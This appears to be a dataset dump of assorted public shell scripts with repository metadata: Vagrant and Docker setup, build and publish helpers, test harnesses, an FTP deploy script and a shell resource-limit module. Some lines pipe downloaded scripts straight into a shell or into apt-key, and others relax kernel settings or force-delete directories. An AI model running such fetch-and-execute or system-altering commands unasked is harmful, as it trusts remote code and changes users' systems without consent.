echo "done" >> /opt/.backgroundfinished
| true
|
11c22e7c23aaac44543d12c11e84bbdd5fdafa3f
|
Shell
|
mingyanisa/fanboi2
|
/vendor/vagrant/bootstrap_builder.sh
|
UTF-8
| 1,240
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/sh
set -xe
apt-get update
apt-get install -y \
apt-transport-https \
ca-certificates \
curl \
dirmngr \
gnupg2 \
software-properties-common
#
# Docker
#
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
apt-get update
apt-get install -y docker-ce docker-compose
systemctl enable docker
systemctl start docker
usermod -aG docker vagrant
#
# IMG
#
apt-get update
apt-get install -y libseccomp-dev uidmap
echo 1 > /proc/sys/kernel/unprivileged_userns_clone
_img_sha256="6b7b660fa0a4c4ab10aa2c2d7d586afdbc70cb33644995b0ee0e7f77ddcc2565"
_img_version="v0.5.4"
curl -fSL "https://github.com/genuinetools/img/releases/download/$_img_version/img-linux-amd64" -o "/usr/local/bin/img" \
&& echo "${_img_sha256} /usr/local/bin/img" | sha256sum -c - \
&& chmod a+x "/usr/local/bin/img"
#
# Google Cloud SDK
#
curl -fsSL https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
apt-add-repository "deb [arch=amd64] http://packages.cloud.google.com/apt cloud-sdk-$(lsb_release -c -s) main"
apt-get update
apt-get install -y google-cloud-sdk
| true
|
c8f3211b051199fec9a21bd892338cf76c025439
|
Shell
|
gdetrez/bnfctest
|
/testbnfc.sh
|
UTF-8
| 456
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
set -u
set -v
BNFC=${1:-bnfc}
TMPDIR=`mktemp -d`
trap 'echo "removing $TMPDIR"; rm -rf ${TMPDIR}' INT TERM EXIT
cd ${TMPDIR}
echo "EAdd. Exp ::= Exp \"+\" Exp1 ;" > Calc.cf
echo "ESub. Exp ::= Exp \"-\" Exp1 ;" >> Calc.cf
echo "EMul. Exp1 ::= Exp1 \"*\" Exp2 ;" >> Calc.cf
echo "EDiv. Exp1 ::= Exp1 \"/\" Exp2 ;" >> Calc.cf
echo "EInt. Exp2 ::= Integer ;" >> Calc.cf
echo "coercions Exp 2 ;" >> Calc.cf
${BNFC} -m Calc.cf
make
| true
|
4a15e6d25593473451c97960acda417d1e8984cd
|
Shell
|
Alegarse/Scripts-de-Linux
|
/ejercicio07.sh
|
UTF-8
| 123
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Script que crea un directorio con el nombre que introduzcas"
mkdir "$1"
echo "El nombre elegido es: $1"
| true
|
0d435ede8a6603806d55d1200b7fd1d5c2d15cfc
|
Shell
|
Arbazbms/5thSem-DS-Algo-CN-AI-UNIX-
|
/USP_LAB/calculator.sh
|
UTF-8
| 97
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/sh
echo "Enter the expression"
read exp
result=`echo $exp|bc`
echo "result: $result"
| true
|
2ca872bea3779cb770549f2c9f4c5e936a546f7e
|
Shell
|
akarzim/zsh-docker-aliases
|
/docker-aliases.plugin.zsh
|
UTF-8
| 1,020
| 3.640625
| 4
|
[
"MIT"
] |
permissive
|
#
# Defines Docker aliases.
#
# Author:
# François Vantomme <akarzim@gmail.com>
#
# Return if requirements are not found.
if (( ! $+commands[docker] )); then
return 1
fi
#
# Functions
#
# Set Docker Machine environment
function dkme {
if (( ! $+commands[docker-machine] )); then
return 1
fi
eval $(docker-machine env $1)
}
# Set Docker Machine default machine
function dkmd {
if (( ! $+commands[docker-machine] )); then
return 1
fi
pushd ~/.docker/machine/machines
if [[ ! -d $1 ]]; then
echo "Docker machine '$1' does not exists. Abort."
popd
return 1
fi
if [[ -L default ]]; then
eval $(rm -f default)
elif [[ -d default ]]; then
echo "A default manchine already exists. Abort."
popd
return 1
elif [[ -e default ]]; then
echo "A file named 'default' already exists. Abort."
popd
return 1
fi
eval $(ln -s $1 default)
popd
}
# Source plugin files
source "${0:h}/alias.zsh"
| true
|
a819e7cb1d9d827337850bd30f16a021fed62796
|
Shell
|
geoladris/core
|
/build-tools/publish-js-dev.sh
|
UTF-8
| 536
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
pomVersion=`grep -oPm1 "(?<=<version>)[^<]+" pom.xml | grep -oE '[0-9]+\.[0-9]+\.[0-9]+'`
packageVersion=`jq -r .version package.json`
if [[ $packageVersion =~ $pomVersion-alpha\.[0-9]+$ ]]; then
v="${packageVersion%.*}.$((${packageVersion##*.}+1))"
else
v="`echo $pomVersion | grep -oE '[0-9]+\.[0-9]+\.[0-9]+'`-alpha.0"
fi
yarn publish --new-version $v --no-git-tag-version --tag dev
if [ "`git status -s package.json | wc -l`" -gt 0 ]; then
git add package.json
git commit -m "Bump package.json version to $v"
fi
| true
|
c663ce30704479e175ce3d3c77d348cf8d3b6825
|
Shell
|
openeuler-mirror/A-Tune
|
/tests/test_atune-adm_check.sh
|
UTF-8
| 1,425
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/sh
# Copyright (c) 2019 Huawei Technologies Co., Ltd.
#
# A-Tune is licensed under the Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http://license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v2 for more details.
# Create: 2020-01-09
# Author: zhangtaibo <sonice1755@163.com>
export TCID="atune-adm check cmd test"
. ./test_lib.sh
init()
{
echo "init the system"
check_service_started atuned
}
cleanup()
{
echo "===================="
echo "Clean the System"
echo "===================="
rm -rf temp.log
}
test01()
{
tst_resm TINFO "atune-adm check cmd test"
# Check cmd function
atune-adm check > temp.log
check_result $? 0
grep -i "Check finished" temp.log
check_result $? 0
# Help info
atune-adm check -h > temp.log
grep "check system basic information" temp.log
check_result $? 0
# Extra input
atune-adm check extra_input > temp.log
grep "Incorrect Usage." temp.log
check_result $? 0
if [ $EXIT_FLAG -ne 0 ];then
tst_resm TFAIL
else
tst_resm TPASS
fi
}
TST_CLEANUP=cleanup
init
test01
tst_exit
| true
|
583e38dbc22ea0b07117c8843018863effa82f77
|
Shell
|
oudream/ccxx
|
/3rd/hiredis/hiredis-msvc/test.sh
|
UTF-8
| 493
| 3.125
| 3
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
#!/bin/sh -ue
REDIS_SERVER=${REDIS_SERVER:-redis-server}
REDIS_PORT=${REDIS_PORT:-56379}
tmpdir=$(mktemp -d)
PID_FILE=${tmpdir}/hiredis-test-redis.pid
SOCK_FILE=${tmpdir}/hiredis-test-redis.sock
cleanup() {
set +e
kill $(cat ${PID_FILE})
rm -rf ${tmpdir}
}
trap cleanup INT TERM EXIT
${REDIS_SERVER} - <<EOF
daemonize yes
pidfile ${PID_FILE}
port ${REDIS_PORT}
bind 127.0.0.1
unixsocket ${SOCK_FILE}
EOF
${TEST_PREFIX:-} ./hiredis-test -h 127.0.0.1 -p ${REDIS_PORT} -s ${SOCK_FILE}
| true
|
414c29c7e7a6394df82bad07ac4cc1bf1c81dd8e
|
Shell
|
andreasds/stocks-crawler
|
/docker/devel/database/devel-mysql-run
|
UTF-8
| 301
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ "$#" -ge 1 ]
then
docker run \
-d \
-it \
-e MYSQL_ROOT_PASSWORD=$1 \
-p 3306:3306 \
-p 33060:33060 \
--restart unless-stopped \
--name devel-mysql \
devel-mysql:1.0
else
echo "ERROR: no argument detected"
echo "./devel-run <mysql_password>"
fi
| true
|
8bec6c1fec13da78b6d802023eb9cb4ee25d9edf
|
Shell
|
great-expectations/great_expectations
|
/ci/checks/check_repo_root_size.sh
|
UTF-8
| 518
| 3.8125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# If you need to add or remove from the repo root please change NUM_ITEMS_SHOULD_BE
# Please take care to only add files or directories to the repo root unless they are
# required to be in the repo root, otherwise please find a more appropriate location.
NUM_ITEMS_SHOULD_BE=41
NUM_ITEMS=$(ls -la | wc -l)
echo "Items found in repo root:"
ls -la
if [ $NUM_ITEMS -ne $NUM_ITEMS_SHOULD_BE ];
then
echo "There should be ${NUM_ITEMS_SHOULD_BE} items in the repo root, you have ${NUM_ITEMS}"
exit 1
fi
| true
|
67a31c13f8a9b6458924f359719f1807ea94d350
|
Shell
|
rsenn/scripts
|
/sh/functions/sf-get-cvs-modules.sh
|
UTF-8
| 954
| 3.453125
| 3
|
[] |
no_license
|
sf-get-cvs-modules() {
(CVSCMD="cvs -z3 -d:pserver:anonymous@\$ARG.cvs.sourceforge.net:/cvsroot/\$ARG co"
# CVSPASS="cvs -d:pserver:anonymous@\$ARG.cvs.sourceforge.net:/cvsroot/\$ARG login"
CVSPASS='echo "${GREP-grep} -q @$ARG.cvs.sourceforge.net ~/.cvspass 2>/dev/null || cat <<\\EOF >>~/.cvspass
\1 :pserver:anonymous@$ARG.cvs.sourceforge.net:2401/cvsroot/$ARG A
EOF"'
for ARG; do
CMD="curl -s http://$ARG.cvs.sourceforge.net/viewvc/$ARG/ | ${SED-sed} -n \"s|^\\([^<>/]\+\\)/</a>\$|\\1|p\""
(set -- $(eval "$CMD")
test $# -gt 1 && DSTDIR="${ARG}-cvs/\${MODULE}" || DSTDIR="${ARG}-cvs"
CMD="${CVSCMD} -d ${DSTDIR} -P \${MODULE}"
#[ -n "$DSTDIR" ] && CMD="(cd ${DSTDIR%/} && $CMD)"
CMD="echo \"$CMD\""
CMD="for MODULE; do $CMD; done"
[ -n "$DSTDIR" ] && CMD="echo \"mkdir -p ${DSTDIR%/}\"; $CMD"
[ -n "$CVSPASS" ] && CMD="$CVSPASS; $CMD"
[ "$DEBUG" = true ] && echo "CMD: $CMD" 1>&2
eval "$CMD")
done)
}
| true
|
18d69867518c8a8f4aa4b234717b82d43d20f923
|
Shell
|
wildfly/wildfly-s2i
|
/test/test-app-extension2/extensions/install.sh
|
UTF-8
| 164
| 2.8125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -x
echo "Running $PWD/install.sh"
injected_dir=$1
# copy any needed files into the target build.
cp -rf ${injected_dir}/modules $JBOSS_HOME
| true
|
78cd276e1070143eaec135ccddd3f2bd18d8a9bc
|
Shell
|
ws1/scripty
|
/src/utility/jpg-resize
|
UTF-8
| 130
| 2.625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# Resizes JPG images in current directory.
for i in *.jpg
do
convert $i -resize 250 $i > /tmp/jpg-resize.log
done
| true
|
9d05fb9789cecee63706b6b4ab3074ae536baf24
|
Shell
|
pruje/deb-builder
|
/build.sh
|
UTF-8
| 5,876
| 4.09375
| 4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
#
# Build script for debian package
#
# MIT License
# Copyright (c) 2019 Jean Prunneaux
#
# go into current directory
cd "$(dirname "$0")"
if [ $? != 0 ] ; then
echo "ERROR: cannot go into current directory"
exit 1
fi
# save current directory path
current_directory=$(pwd)
build_directory=archives/build
# test if sources are there
if ! [ -d src ] ; then
echo "ERROR: you must put your sources in the src directory!"
exit 1
fi
#
# Functions
#
# Print help
# Usage: print_help
print_help() {
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo " -v, --version VERSION Specify a version"
echo " -f, --force Do not print confimation before build"
echo " -h, --help Print this help"
}
# Get version from latest git tag
# Usage: $(get_version)
# (to keep context)
get_version() {
cd src || return 1
local version
version=$(git describe --tags)
# remove 'v'
[ "${version:0:1}" == v ] && version=${version:1}
echo -n $version
}
# Fix all directory permissions to 755
# Usage: set_permissions /path/to/dir
fix_permissions() {
local d=$1
while [ "$d" != . ] ; do
chmod 755 "$d"
d=$(dirname "$d")
done
}
# Clean build directory
# Usage: clean_build
clean_build() {
[ -d "$current_directory/$build_directory" ] || return 0
sudo rm -rf "$current_directory/$build_directory"
}
# Quit and clean build directory
# Usage: quit EXITCODE
quit() {
clean_build &> /dev/null
exit $1
}
#
# Main program
#
# get options
while [ $# -gt 0 ] ; do
case $1 in
-v|--version)
if [ -z "$2" ] ; then
print_help
exit 1
fi
version=$2
shift
;;
-f|--force)
force_mode=true
;;
-h|--help)
print_help
exit
;;
*)
break
;;
esac
shift
done
# test config files
for f in build.conf package/DEBIAN/control ; do
if ! [ -f debconf/"$f" ] ; then
echo "ERROR: $f does not exists. Please verify your 'debconf' folder."
exit 1
fi
done
# load build config file
if ! source debconf/build.conf ; then
echo "There are errors inside your build.conf"
exit 1
fi
# test name
if [ -z "$name" ] ; then
echo "You must set a name for your package"
exit 1
fi
# test path
if [ -z "$path" ] ; then
echo "You must set a path where you sources are going!"
exit 1
fi
if [ -f "$current_directory"/debconf/prebuild.sh ] ; then
echo "Run prebuild..."
if ! cd src ; then
echo "... Failed to go in sources directory!"
exit 7
fi
source "$current_directory"/debconf/prebuild.sh
if [ $? != 0 ] ; then
echo "... Failed!"
exit 7
fi
# return in current directory
if ! cd "$current_directory" ; then
echo "... Failed to go in current directory!"
exit 7
fi
echo
fi
# prompt to choose version
if [ -z "$version" ] ; then
# try to get version from latest git tag
version=$(get_version 2> /dev/null)
echo -n "Choose version: "
[ -n "$version" ] && echo -n "[$version] "
read version_user
if [ -n "$version_user" ] ; then
version=$version_user
else
# no specified version: quit
[ -z "$version" ] && exit 1
fi
echo
fi
# set package name
package=$(echo "$name" | sed "s/{version}/$version/").deb
if [ "$force_mode" != true ] ; then
echo "You are about to build $package"
echo -n "Continue (y/N)? "
read confirm
[ "$confirm" != y ] && exit
fi
# clean and copy package files
echo
echo "Clean & prepare build environment..."
mkdir -p archives && clean_build && \
cp -rp debconf/package "$build_directory"
if [ $? != 0 ] ; then
echo "... Failed! Please check your access rights."
exit 3
fi
echo "Set version number..."
sed -i "s/^Version: .*$/Version: $version/" "$build_directory"/DEBIAN/control
if [ $? != 0 ] ; then
echo "... Failed! Please check your access rights."
quit 4
fi
echo "Copy sources..."
install_path=$build_directory/$path
mkdir -p "$(dirname "$install_path")" && \
cp -rp src "$install_path"
if [ $? != 0 ] ; then
echo "... Failed! Please check your access rights."
quit 5
fi
echo "Clean unnecessary files..."
if ! cd "$install_path" ; then
echo "... Failed to go inside path directory!"
quit 6
fi
for f in "${clean[@]}" ; do
if [ "${f:0:1}" == '/' ] ; then
files=(".$f")
else
files=($(find . -name "$f"))
fi
if [ ${#files[@]} -gt 0 ] ; then
echo "Delete ${files[@]}..."
if ! rm -rf "${files[@]}" ; then
echo '... Failed!'
quit 6
fi
fi
done
echo
echo "Set root privileges..."
# go into build directory
cd "$current_directory/$build_directory"
if [ $? != 0 ] ; then
echo "... Failed to go into build directory!"
quit 8
fi
# fix directories permissions & set root privileges
fix_permissions ".$path" && sudo chown -R root:root .
if [ $? != 0 ] ; then
echo "... Failed!"
quit 8
fi
# postbuild
if [ -f "$current_directory"/debconf/postbuild.sh ] ; then
echo
echo "Run postbuild..."
source "$current_directory"/debconf/postbuild.sh
if [ $? != 0 ] ; then
echo "... Failed!"
quit 9
fi
fi
echo
echo "Generate deb package..."
# go into archives directory
cd "$current_directory"/archives
if [ $? != 0 ] ; then
echo "... Failed to go into archives directory!"
quit 10
fi
# generate deb file + give ownership to current user
sudo dpkg-deb --build build "$package" && \
sudo chown "$(whoami)" "$package"
if [ $? != 0 ] ; then
echo "... Failed!"
quit 10
fi
echo
echo "Create version directory..."
# create package version directory
mkdir -p "$version" && mv "$package" "$version"
if [ $? != 0 ] ; then
echo "... Failed!"
quit 11
fi
echo "Clean files..."
clean_build
echo
echo "Generate checksum..."
if cd "$version" ; then
# generate checksum
cs=$(shasum -a 256 "$package")
if [ -n "$cs" ] ; then
# write checksum in file
echo "$cs" > sha256sum.txt
if [ $? != 0 ] ; then
echo "... Failed to write inside checksum file!"
fi
else
echo "... Failed to generate checksum!"
fi
else
echo "... Failed to go into version directory!"
fi
echo
echo "Package is ready!"
| true
|
f1ec64c0c43bae36f1cb7c47bde6b87b238c1bed
|
Shell
|
stden/bash
|
/p2/cycle.sh
|
UTF-8
| 233
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# Умножение в бесконечном цикле двух случайных чисел
while :
do
i=$[$RANDOM*$RANDOM]
# echo $i # Раскомментировать для вывода на консоль
done
| true
|
46218f92b12179960294eeffcd1c76a7e048ddb7
|
Shell
|
tjtolon/dotfiles
|
/install/install_franz.sh
|
UTF-8
| 602
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
if command -v franz >> /dev/null; then
echo "command already exists"
else
sudo apt install -y gconf2 gconf-service libappindicator1
sudo apt install -y jq
function parse_latest_deb_url() {
curl_result=$(curl --silent "https://api.github.com/repos/$1/releases/latest")
only_deb=$(echo $curl_result | jq '.assets[]|.browser_download_url'|grep ".*deb\"")
eval "$2=$only_deb"
}
dl_url=''
parse_latest_deb_url meetfranz/franz dl_url
echo $dl_url
wget $dl_url
filename=${dl_url##*/}
sudo dpkg -i $filename
rm $filename
fi
| true
|
ae5c883f4e4e6d0bd5fb0711d9bdf078ea5baf09
|
Shell
|
RobBrazier/entitydecode.com
|
/.semaphore/deploy.sh
|
UTF-8
| 580
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
set -exo pipefail
ftp_url="ftp://$BUNNYCDN_USERNAME:$BUNNYCDN_PASSWORD@storage.bunnycdn.com"
cd public
ftp_options="--reverse --no-perms --transfer-all --overwrite"
lftp "$ftp_url" -e "mirror --dry-run $ftp_options --delete; bye" > ../to-delete.txt
to_delete=$(grep rm ../to-delete.txt | awk -F"$BUNNYCDN_USERNAME/" '{ print $2 }' || true)
lftp "$ftp_url" -e "mirror $ftp_options --verbose; bye"
lftp_command=""
for f in $to_delete; do
lftp_command="rm -r $f; $lftp_command"
done
if [ -n "$lftp_command" ]; then
lftp "$ftp_url" -e "$lftp_command bye"
fi
| true
|
761b247bde8e4f64c8fb5286f9efef9829bbf4c7
|
Shell
|
Hermitter/dotfiles
|
/config/sway/scripts/start_on_boot.sh
|
UTF-8
| 551
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# Starts apps with the specified commands and avoids starting if already running.
# The app name used should the same as the process name.
for pair in "$@"; do
# split arg into seperate variables
IFS=:; set -- $pair
NAME=$1
CMD=$2
if pgrep -x "$NAME" > /dev/null
then
echo "Not starting '$NAME'. App already running"
else
eval $CMD &
fi
done
# Kill each child process. The disown command was not used because an empty process was
# left behind for each app that was disowned.
pkill -P $$
| true
|
8e354a11a796e9fcf341c380e4c0f7d3c21fb231
|
Shell
|
michaeldallen/raspbian_bootstrap
|
/v2/io.mdabone.device.bootstrap.onboard.52-docker.bash
|
UTF-8
| 508
| 2.84375
| 3
|
[] |
no_license
|
# see: https://gist.github.com/alexellis/fdbc90de7691a1b9edb545c17da2d975
if which docker ; then
echo no action taken
else
curl -sSL get.docker.com | sh
usermod pi -aG docker
dphys-swapfile swapoff
dphys-swapfile uninstall
update-rc.d dphys-swapfile remove
if ! grep --silent 'cgroup_enable=cpuset cgroup_memory=1' /boot/cmdline.txt ; then
sed -i 's/$/ cgroup_enable=cpuset cgroup_memory=1/' /boot/cmdline.txt
echo update /boot/cmdline.txt
fi
fi
| true
|
aa238e621e1b2e0db0d379ccd1152352c4d46c36
|
Shell
|
aritama/sisop-2012-2c
|
/SHIELD/modulos/periodicos/limitaciones/modulo_limitaciones.sh
|
UTF-8
| 4,294
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
function iniciar
{
export MAX_CPU=50
export MAX_MEM=75
export MAX_PROCS=10
export MAX_SOCKS=3
export MAX_ARCHS=4
local limitacionesInit="$(cat ~/.shield/MODULES_CONFIG/limitaciones.config)"
eval "${limitacionesInit}"
###
local listaConsumoCPU=$(ps h u t | awk '{print $3}')
consumoCPU=0
for consumo in $listaConsumoCPU
do
consumoCPU=$(echo "${consumoCPU} + ${consumo}" | bc -l)
done
###
local listaConsumoMEM=$(ps h u t | awk '{print $4}')
consumoMEM=0
for consumo in $listaConsumoMEM
do
consumoMEM=$(echo "${consumoMEM} + ${consumo}" | bc -l)
done
###
consumoPROCS=$(($(ps h u t | wc -l) - 5)) ## sin contar procesos de 1)login,2)bash,3)ps, 4)wc,5)asignacion,,sin contar los que ya estaban
###
local listaPIDS=$(ps h u t | awk '{print $2}' | uniq)
local listaSocketsPids=$(lsof -i4 | grep TCP | grep -v "localhost" | awk '{print $2}' | uniq)
consumoSOCKS=0
for limitPid in $listaPIDS
do
for limitPid2 in $listaSocketsPids
do
if [ $limitPid -eq $limitPid2 ]
then
consumoSOCKS=$(($consumoSOCKS + 1))
fi
done
done
###
local mytty=`tty`
consumoARCHS=0
local listTtyPids=$(lsof $mytty | awk '{print $2}' | uniq)
for pid in $listTtyPids
do
auxConsArchs="$(ls "/proc/${pid}/fd" 2> /dev/null | tr "$IFS" '\n')"
auxConsArchs="$(echo "${auxConsArchs}" | grep -v 0 | grep -v 1 | grep -v 2 | grep -v 3 | grep -v 255)"
if [ "$auxConsArchs" == "" ]
then
auxConsArchs=0
else
auxConsArchs=$(echo "${auxConsArchs}" | wc -l)
fi
consumoARCHS=$(($consumoARCHS + ${auxConsArchs}))
done
return 0
}
function detener
{
unset MAX_CPU
unset MAX_MEM
unset MAX_PROCS
unset MAX_SOCKS
unset MAX_ARCHS
return 0
}
function procesar
{
local listaConsumoCPU=$(ps h u t | awk '{print $3}')
consumoCPU=0
for consumo in $listaConsumoCPU
do
consumoCPU=$(echo "${consumoCPU} + ${consumo}" | bc -l)
done
if [ $(echo "${consumoCPU} > ${MAX_CPU}" | bc -l) -eq 1 ]
then
return 1
fi
###
local listaConsumoMEM=$(ps h u t | awk '{print $4}')
consumoMEM=0
for consumo in $listaConsumoMEM
do
consumoMEM=$(echo "${consumoMEM} + ${consumo}" | bc -l)
done
if [ $(echo "${consumoMEM} > ${MAX_MEM}" | bc -l) -eq 1 ]
then
return 1
fi
###
consumoPROCS=$(($(ps h u t | wc -l) - 9)) ## sin contar procesos de 1)login,2)bash,3)ps, 4)wc,5)asignacion,,sin contar los que ya estaban
if [ $(echo "${consumoPROCS} > ${MAX_PROCS}" | bc -l) -eq 1 ]
then
return 1
fi
###
local listaPIDS=$(ps h u t | awk '{print $2}' | uniq)
local listaSocketsPids=$(lsof -i4 | grep TCP | grep -v "localhost" | awk '{print $2}' | uniq)
consumoSOCKS=0
for limitPid in $listaPIDS
do
for limitPid2 in $listaSocketsPids
do
if [ $limitPid -eq $limitPid2 ]
then
consumoSOCKS=$(($consumoSOCKS + 1))
fi
done
done
if [ $consumoSOCKS -gt $MAX_SOCKS ]
then
return 1
fi
###
local mytty=`tty`
consumoARCHS=0
local listTtyPids=$(lsof $mytty | awk '{print $2}' | uniq)
for pid in $listTtyPids
do
auxConsArchs="$(ls "/proc/${pid}/fd" 2> /dev/null | tr "$IFS" '\n')"
auxConsArchs="$(echo "${auxConsArchs}" | grep -v 0 | grep -v 1 | grep -v 2 | grep -v 3 | grep -v 255)"
if [ "$auxConsArchs" == "" ]
then
auxConsArchs=0
else
auxConsArchs=$(echo "${auxConsArchs}" | wc -l)
fi
consumoARCHS=$(($consumoARCHS + ${auxConsArchs}))
done
#consumoARCHS=$(($(lsof $mytty | awk '{print $2}' | uniq | wc -l) - 11)) # menos lsof,awk,uniq,wc,asig,bash
if [ $consumoARCHS -gt $MAX_ARCHS ]
then
return 1
fi
return 0
}
function informacion
{
echo -e "\nMAX_CPU: ${MAX_CPU} ; consumoCPU: ${consumoCPU}"
echo "MAX_MEM: ${MAX_MEM} ; consumoMEM: ${consumoMEM}"
echo "MAX_SOCKS: ${MAX_SOCKS} ; consumoSOCKS: ${consumoSOCKS}"
echo "MAX_PROCS: ${MAX_PROCS} ; consumoPROCS: ${consumoPROCS}"
echo -e "MAX_ARCHS: ${MAX_ARCHS} ; consumoARCHS: ${consumoARCHS}\n"
return 0
}
case "$1" in
"iniciar")
iniciar
;;
"detener")
detener
;;
"procesar")
procesar
;;
"informacion")
informacion
;;
esac
| true
|
5094aaf88cd4de504e2cc6730cf3704e5330f515
|
Shell
|
justinbloomfield/crux-ports
|
/drist/Pkgfile
|
UTF-8
| 567
| 2.875
| 3
|
[] |
no_license
|
# Description: Tool to configure and sync configurations to servers
# URL: git://bitreich.org/drist
# Maintainer: poq <jbloomfield at live dot com>
# Depends on:
name=drist
version=git-c4d5a55
sversion=c4d5a55
release=1
source=()
gitsource=git://bitreich.org/drist
build() {
cd $PKGMK_SOURCE_DIR
if cd $name; then
git reset --hard
git pull $gitsource
else
git clone $gitsource $name
cd $name
fi
git checkout $sversion
make DESTDIR=$PKG PREFIX=/usr MANPREFIX=/usr/man install
}
# vim: set ft=sh ts=4 et:
| true
|
92855210753ccf6fea8a6b33fe92dec9b9318efe
|
Shell
|
clz1/data_consistent_test
|
/rbdmirror_failure/check.sh
|
UTF-8
| 1,285
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/sh
DEV_primary=$1
DEV_passive=$2
zero_md5=`md5sum 4K_zero|awk '{print $1}'`
first_zero=0
count=0
while true; do
rm -rf read_4K_primary
rm -rf read_4K_passive
dd if=${DEV_primary} of=read_4K_primary bs=4K count=1 skip=$count >/dev/null 2>&1
dd if=${DEV_passive} of=read_4K_passive bs=4K count=1 skip=$count >/dev/null 2>&1
read_passive_size=`ls -l read_4K_passive|awk '{print $5}'`
if [ ${read_passive_size} == 0 ]; then
echo "Success: read 0 bytes. check finished at block count: $count"
exit 0
fi
read_primary_md5=`md5sum read_4K_primary|awk '{print $1}'`
read_passive_md5=`md5sum read_4K_passive|awk '{print $1}'`
if [ ${read_passive_md5} != ${zero_md5} ]; then
if [ ${first_zero} == 1 ]; then
echo "Not zero data, but first zero is already found. at block count: ${count}"
exit 1
fi
if [ ${read_passive_md5} != ${read_primary_md5} ]; then
echo "Found data is not equal with expected: at block count ${count}"
exit 1
fi
echo "Found data is equal with read_primary_md5: at block count ${count}"
else
if [ ${first_zero} == 0 ]; then
echo "Found first zero block: at block count ${count}"
first_zero=1
fi
echo "Found zero block and first zero block has been ok: at block count ${count}"
fi
count=$((${count}+1))
done
| true
|
7a4b7ecff4387b1eb3cee2e99c5400537cb79bb4
|
Shell
|
andreashdez/dotfiles
|
/.local/bin/notify_battery.sh
|
UTF-8
| 258
| 2.65625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Script used by systemd timer unit to notify low battery charge
acpi --battery \
| awk '/Discharging/ { if (int($4) < 15) print $4 " " $5 " " $6 }' \
| xargs -ri notify-send --urgency=critical "WARNING: Low battery" "Battery is at {}"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.